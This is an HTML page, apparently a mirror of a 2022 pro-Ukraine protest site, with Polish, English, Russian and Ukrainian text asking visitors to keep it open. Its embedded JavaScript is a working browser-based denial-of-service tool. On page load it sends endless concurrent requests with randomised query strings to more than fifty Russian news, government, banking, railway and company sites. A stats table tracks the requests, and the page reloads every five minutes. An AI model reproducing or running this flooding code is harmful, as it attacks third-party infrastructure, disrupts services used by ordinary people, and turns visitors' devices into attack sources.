<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><style></style>
  
  <title>russia MUST BE STOPPED!</title>
  <style>
    tr:nth-child(even) {background: #CCC}
    tr:nth-child(odd) {background: #FFF}
    .ellipsis {
      display: inline-block;
      width: 33%;
      overflow: hidden;
      text-overflow: ellipsis;
      white-space: nowrap;
    }
  </style>
</head>
<body>
  <h1>Mirror strony z: <a href="https://stop-russian-desinformation.near.page" blank="_blank">https://stop-russian-desinformation.near.page</A></h1>
  <h1>Russia MUST BE STOPPED! Help Ukraine WIN!</h1>
  <table width="100%">
    <tbody><tr>
      <td width="23%">
        <h3>Wersja polska</h3>
        <p>Oficjalne wiadomości w Federacji Rosyjskiej są w większości fałszywe i uważamy, że lepiej jest je zamknąć i pozwolić ludziom przejść na wiarygodne źródła informacji.</p>
        <p>Prosimy, po prostu otwórzcie tę stronę i pozwólcie jej być otwartej na Waszych urządzeniach. Spowoduje to zalanie rosyjskich stron propagandowych i ogromne obciążenie ich infrastruktury.</p>
        <p>Twoja przeglądarka będzie działać wolno. Nie martwcie się i nie przerywajcie działania.</p>
        <p>Mały wkład każdego z nas może uratować Ukrainę 🙏</p>
      </td>
      <td width="23%">
        <h3>English version</h3>
        <p>The "official" news in the Russian Federation is mostly fake and we believe it is
            better to shut them down and let people switch to trustful news.</p>
        <p>Please, just open this page and let it be open on your devices. It will flood the
            Russian propaganda websites and pose a huge load on their infrastructure.</p>
        <p>Your browser will be slow. It's ok, don't worry and keep it run.</p>
        <p>A small contribution from each of us will save Ukraine 🙏</p>
      </td>
      <td width="23%">
        <h3>Русская версия</h3>
        <p>«Официальные» новости в РФ полны пропаганды и транслируют лживую информацию о
            событиях на Украине. Мы считаем, что лучше их закрыть и позволить людям
            переключиться на достоверные новости.</p>
        <p>Пожалуйста, откройте эту страницу на ваших устройствах. Это зальёт российские
            пропагандистские сайты запросами и создаст огромную нагрузку на их
            инфраструктуру.</p>
        <p>Ваш браузер будет работать медленно. Все в порядке, не волнуйтесь и держите его
            открытым.</p>
        <p>Небольшой вклад каждого из нас спасет Украину 🙏</p>
      </td>
      <td width="23%">
        <h3>Українська версія</h3>
        <p>«Офіційні» новини в РФ сповнені пропаганди та транслюють брехливу інформацію про
            події в Україні. Ми вважаємо, що краще їх закрити та дозволити людям переключитися
            на достовірні новини.</p>
        <p>Будь ласка, відкрийте цю сторінку на вашому пристрої. Це закидає російські
            пропагандистські сайти запитами та створить величезне навантаження на їхню
            інфраструктуру.</p>
        <p>Ваш браузер працюватиме повільно. Все гаразд, не хвилюйтеся та тримайте його
            відкритим.</p>
        <p>Невеликий внесок кожного з нас врятує Україну 🙏</p>
      </td>
    </tr>
   </tbody></table>
   <hr style="margin: 3em 1em 2em 1em;">
   <div id="stats"><table width="100%"><thead><tr><th>URL</th><th>Number of Requests</th><th>Number of Errors</th></tr></thead><tbody><tr><td>https://lenta.ru/</td><td>2714</td><td>41</td></tr><tr><td>https://ria.ru/</td><td>1652</td><td>42</td></tr><tr><td>https://ria.ru/lenta/</td><td>1650</td><td>42</td></tr><tr><td>https://www.rbc.ru/</td><td>1676</td><td>43</td></tr><tr><td>https://www.rt.com/</td><td>1665</td><td>44</td></tr><tr><td>http://kremlin.ru/</td><td>1729</td><td>1729</td></tr><tr><td>http://en.kremlin.ru/</td><td>1688</td><td>1688</td></tr><tr><td>https://smotrim.ru/</td><td>1676</td><td>41</td></tr><tr><td>https://tass.ru/</td><td>1731</td><td>41</td></tr><tr><td>https://tvzvezda.ru/</td><td>1690</td><td>42</td></tr><tr><td>https://vsoloviev.ru/</td><td>1685</td><td>43</td></tr><tr><td>https://www.1tv.ru/</td><td>1721</td><td>47</td></tr><tr><td>https://www.vesti.ru/</td><td>1829</td><td>86</td></tr><tr><td>https://online.sberbank.ru/</td><td>1678</td><td>42</td></tr><tr><td>https://sberbank.ru/</td><td>1681</td><td>43</td></tr><tr><td>https://zakupki.gov.ru/</td><td>1668</td><td>44</td></tr><tr><td>https://www.gosuslugi.ru/</td><td>1673</td><td>114</td></tr><tr><td>https://er.ru/</td><td>1692</td><td>58</td></tr><tr><td>https://www.rzd.ru/</td><td>1665</td><td>41</td></tr><tr><td>https://rzdlog.ru/</td><td>1658</td><td>42</td></tr><tr><td>https://vgtrk.ru/</td><td>1677</td><td>43</td></tr><tr><td>https://www.interfax.ru/</td><td>2489</td><td>58</td></tr><tr><td>https://www.mos.ru/uslugi/</td><td>1695</td><td>43</td></tr><tr><td>http://government.ru/</td><td>1756</td><td>1756</td></tr><tr><td>https://mil.ru/</td><td>1890</td><td>41</td></tr><tr><td>https://www.nalog.gov.ru/</td><td>1680</td><td>43</td></tr><tr><td>https://customs.gov.ru/</td><td>1716</td><td>52</td></tr><tr><td>https://pfr.gov.ru/</td><td>1775</td><td>44</td></tr><tr><td>https://rkn.gov.ru/</td><td>1714</td><td>51</td></tr><tr><td>https://www.gazprombank.ru/</td><td>3304</td><td>84</td></tr><tr><td>https://www.vtb.ru/</td><td>1675</td><td>41</td></tr><tr><td>https://www.gazprom.ru/</td><td>1713</td><td>43</td></tr><tr><td>https://lukoil.ru</td><td>1703</td><td>42</td></tr><tr><td>https://magnit.ru/</td><td>2159</td><td>46</td></tr><tr><td>https://www.nornickel.com/</td><td>1688</td><td>37</td></tr><tr><td>https://www.surgutneftegas.ru/</td><td>1703</td><td>39</td></tr><tr><td>https://www.tatneft.ru/</td><td>1710</td><td>40</td></tr><tr><td>https://www.evraz.com/ru/</td><td>1668</td><td>41</td></tr><tr><td>https://nlmk.com/</td><td>1676</td><td>39</td></tr><tr><td>https://www.sibur.ru/</td><td>1680</td><td>42</td></tr><tr><td>https://www.severstal.com/</td><td>1655</td><td>43</td></tr><tr><td>https://www.metalloinvest.com/</td><td>1721</td><td>41</td></tr><tr><td>https://nangs.org/</td><td>1690</td><td>47</td></tr><tr><td>https://rmk-group.ru/ru/</td><td>1700</td><td>41</td></tr><tr><td>https://www.tmk-group.ru/</td><td>1672</td><td>40</td></tr><tr><td>https://ya.ru/</td><td>1733</td><td>47</td></tr><tr><td>https://www.polymetalinternational.com/ru/</td><td>1692</td><td>44</td></tr><tr><td>https://www.uralkali.com/ru/</td><td>1694</td><td>43</td></tr><tr><td>https://www.eurosib.ru/</td><td>1694</td><td>113</td></tr><tr><td>https://ugmk.ua/</td><td>1937</td><td>44</td></tr><tr><td>https://omk.ru/</td><td>1821</td><td>41</td></tr></tbody></table></div>

<script>
var randomWord = (function() {
  var liryc = 'Gdy znów do murów klajstrem świeżym, Przylepiać zaczną obwieszczenia, Gdy „do ludności"" „do żołnierzy"", Na alarm czarny druk uderzy, I byle drab i byle szczeniak, Wodwieczne kłamstwo ich uwierzy, Że trzeba iść i z armat walić, Mordować grabić truć i palić, Gdy zaczną na tysiączną modłę, Ojczyznę szarpać deklinacją, I łudzić kolorowym godłem, I judzić „historyczną racją", O piędzi chwale i rubieży, Ojcach pradziadach i sztandarach, O bohaterach i ofiarach, Gdy wyjdzie biskup pastor rabin, Pobłogosławić twój karabin, Bo mu sam Pan Bóg szepnął z nieba, Że za ojczyznę bić się trzeba, Kiedy rozścierwi się rozchami, Wrzask liter pierwszych stron dzienników, A stado dzikich bab kwiatami, Obrzucać zacznie „żołnierzyków", O przyjacielu nieuczony, Mój bliźni z tej czy innej ziemi, Wiedz że na trwogę biją w dzwony, Króle z panami brzuchatemi, Wiedz że to bujda granda zwykła, Gdy ci wołają „Broń na ramię", Że im gdzieś nafta z ziemi sikła, I obrodziła dolarami, Że coś im w bankach nie sztymuje, Że gdzieś zwęszyli kasy pełne, Lub upatrzyły tłuste szuje, Cło jakieś grubsze na bawełnę, Rżnij karabinem w bruk ulicy, Twoja jest krew a ich jest nafta, I od stolicy do stolicy, Zawołaj broniąc swej krwawicy, „Bujać to my panowie szlachta"';
  var dictionary = liryc.split(' ');

  l = dictionary.length;
  return () => dictionary[Math.floor(Math.random() * l)];
})();


var targets = {
  'https://tass.com/': { path: 'search?type=default,interview,article,opinion,online,explainer,infographic,special,test,poll,event,official&sections=4954,4844,4845,4953,4957,4992,4956,4869,4981&searchStr=putin&sort=date', number_of_requests: 0, number_of_errored_responses: 0 },
  'https://sputniknews.com': { path: '', number_of_requests: 0, number_of_errored_responses: 0 },
  'https://lenta.ru/': { path: '', number_of_requests: 0, number_of_errored_responses: 0 },
  'https://ria.ru/': { path: '', number_of_requests: 0, number_of_errored_responses: 0 },
  'https://ria.ru/lenta/': { path: '', number_of_requests: 0, number_of_errored_responses: 0 },
  'https://www.rbc.ru/': { path: '', number_of_requests: 0, number_of_errored_responses: 0 },
  'https://www.rt.com/': { path: '', number_of_requests: 0, number_of_errored_responses: 0 },
  'http://kremlin.ru/': { path: '', number_of_requests: 0, number_of_errored_responses: 0 },
  'http://en.kremlin.ru/': { path: '', number_of_requests: 0, number_of_errored_responses: 0 },
  'https://smotrim.ru/': { path: '', number_of_requests: 0, number_of_errored_responses: 0 },
  'https://tass.ru/': { path: '', number_of_requests: 0, number_of_errored_responses: 0 },
  'https://tvzvezda.ru/': { path: '', number_of_requests: 0, number_of_errored_responses: 0 },
  'https://vsoloviev.ru/': { path: '', number_of_requests: 0, number_of_errored_responses: 0 },
  'https://www.1tv.ru/': { path: '', number_of_requests: 0, number_of_errored_responses: 0 },
  'https://www.vesti.ru/': { path: '', number_of_requests: 0, number_of_errored_responses: 0 },
  'https://online.sberbank.ru/': { path: '', number_of_requests: 0, number_of_errored_responses: 0 },
  'https://sberbank.ru/': { path: '', number_of_requests: 0, number_of_errored_responses: 0 },
  'https://zakupki.gov.ru/': { path: '', number_of_requests: 0, number_of_errored_responses: 0 },
  'https://www.gosuslugi.ru/': { path: '', number_of_requests: 0, number_of_errored_responses: 0 },
  'https://er.ru/': { path: '', number_of_requests: 0, number_of_errored_responses: 0 },
  'https://www.rzd.ru/': { path: '', number_of_requests: 0, number_of_errored_responses: 0 },
  'https://rzdlog.ru/': { path: '', number_of_requests: 0, number_of_errored_responses: 0 },
  'https://vgtrk.ru/': { path: '', number_of_requests: 0, number_of_errored_responses: 0 },
  'https://www.interfax.ru/': { path: '', number_of_requests: 0, number_of_errored_responses: 0 },
  'https://www.mos.ru/uslugi/': { path: '', number_of_requests: 0, number_of_errored_responses: 0 },
  'http://government.ru/': { path: '', number_of_requests: 0, number_of_errored_responses: 0 },
  'https://mil.ru/': { path: '', number_of_requests: 0, number_of_errored_responses: 0 },
  'https://www.nalog.gov.ru/': { path: '', number_of_requests: 0, number_of_errored_responses: 0 },
  'https://customs.gov.ru/': { path: '', number_of_requests: 0, number_of_errored_responses: 0 },
  'https://pfr.gov.ru/': { path: '', number_of_requests: 0, number_of_errored_responses: 0 },
  'https://rkn.gov.ru/': { path: '', number_of_requests: 0, number_of_errored_responses: 0 },
  'https://www.gazprombank.ru/': { path: '', number_of_requests: 0, number_of_errored_responses: 0 },
  'https://www.vtb.ru/': { path: '', number_of_requests: 0, number_of_errored_responses: 0 },
  'https://www.gazprom.ru/': { path: '', number_of_requests: 0, number_of_errored_responses: 0 },
  'https://lukoil.ru': { path: '', number_of_requests: 0, number_of_errored_responses: 0 },
  'https://magnit.ru/': { path: '', number_of_requests: 0, number_of_errored_responses: 0 },
  'https://www.nornickel.com/': { path: '', number_of_requests: 0, number_of_errored_responses: 0 },
  'https://www.surgutneftegas.ru/': { path: '', number_of_requests: 0, number_of_errored_responses: 0 },
  'https://www.tatneft.ru/': { path: '', number_of_requests: 0, number_of_errored_responses: 0 },
  'https://www.evraz.com/ru/': { path: '', number_of_requests: 0, number_of_errored_responses: 0 },
  'https://nlmk.com/': { path: '', number_of_requests: 0, number_of_errored_responses: 0 },
  'https://www.sibur.ru/': { path: '', number_of_requests: 0, number_of_errored_responses: 0 },
  'https://www.severstal.com/': { path: '', number_of_requests: 0, number_of_errored_responses: 0 },
  'https://www.metalloinvest.com/': { path: '', number_of_requests: 0, number_of_errored_responses: 0 },
  'https://nangs.org/': { path: '', number_of_requests: 0, number_of_errored_responses: 0 },
  'https://rmk-group.ru/ru/': { path: '', number_of_requests: 0, number_of_errored_responses: 0 },
  'https://www.tmk-group.ru/': { path: '', number_of_requests: 0, number_of_errored_responses: 0 },
  'https://ya.ru/': { path: '', number_of_requests: 0, number_of_errored_responses: 0 },
  'https://www.polymetalinternational.com/ru/': { path: '', number_of_requests: 0, number_of_errored_responses: 0 },
  'https://www.uralkali.com/ru/': { path: '', number_of_requests: 0, number_of_errored_responses: 0 },
  'https://www.eurosib.ru/': { path: '', number_of_requests: 0, number_of_errored_responses: 0 },
  'https://ugmk.ua/': { path: '', number_of_requests: 0, number_of_errored_responses: 0 },
  'https://omk.ru/': { path: '', number_of_requests: 0, number_of_errored_responses: 0 }, 
}

var PRINT_INTERVAL = 2000; // 2 seconds
var CONCURRENCY_LIMIT = 1000; // 1 second
var REQ_TIMEOUT = 5000; // 5 seconds
var PAGE_RELOAD_TIMEOUT = 5 * 60 * 1000 // 5 minutes

var queue = []

// Drow stats
function calculateStyle(req, errors) {
  return 'background-color:rgba(255, 0, 0, ' + (errors/req) + ')';
}

function drowTableRows() {
  return '<tbody>' + Object.entries(targets).map(
    ([target, { number_of_requests, number_of_errored_responses  }]) => {
        return '<tr><td width="33%" class="ellipsis">' + target + '</td>'
          + '<td width="33%">' + number_of_requests + '</td>'
          + '<td width="33%" style="'+ calculateStyle(number_of_requests, number_of_errored_responses) +'">'
          + number_of_errored_responses + '</td></tr>';
      }
    ).join('') + '</tbody>';
}

var statsEl = document.getElementById('stats');
function printStats() {
  statsEl.innerHTML = `
    <table width="100%">
      <thead>
        <tr>
          <th width="33%">URL</th>
          <th width="33%">Number of Requests</th>
          <th width="33%">Number of Errors</th>
        </tr>
      </thead>'` + drowTableRows() + '</table>';
}
setInterval(printStats, PRINT_INTERVAL);

async function fetchWithTimeout(resource, options) {
  const controller = new AbortController();
  const id = setTimeout(() => controller.abort(), options.timeout);
  return fetch(resource, {
    method: 'GET',
    mode: 'no-cors',
    signal: controller.signal
  }).then((response) => {
    clearTimeout(id);
    return response;
  }).catch((error) => {
    clearTimeout(id);
    throw error;
  });
}

async function flood(target) {
  while (true) {
    if (queue.length > CONCURRENCY_LIMIT) {
      await queue.shift()
    }
    rand = '?query=' + randomWord() + '&_=' + Math.random() * 1000;
    let url = target + targets[target].path + rand;
    queue.push(
      fetchWithTimeout(url, { timeout: REQ_TIMEOUT })
        .catch((error) => {
          if (error.code === 20 /* ABORT */) {
            return;
          }
          targets[target].number_of_errored_responses++;
        })
        .then((response) => {
          if (response && !response.ok) {
            targets[target].number_of_errored_responses++;
          }
          targets[target].number_of_requests++;
        })
    )
  }
}

// Start
Object.keys(targets).map(flood);

// Reload to get latest version of the page, clear cache and free some browser momory
setTimeout(() => location.reload(), PAGE_RELOAD_TIMEOUT);
</script>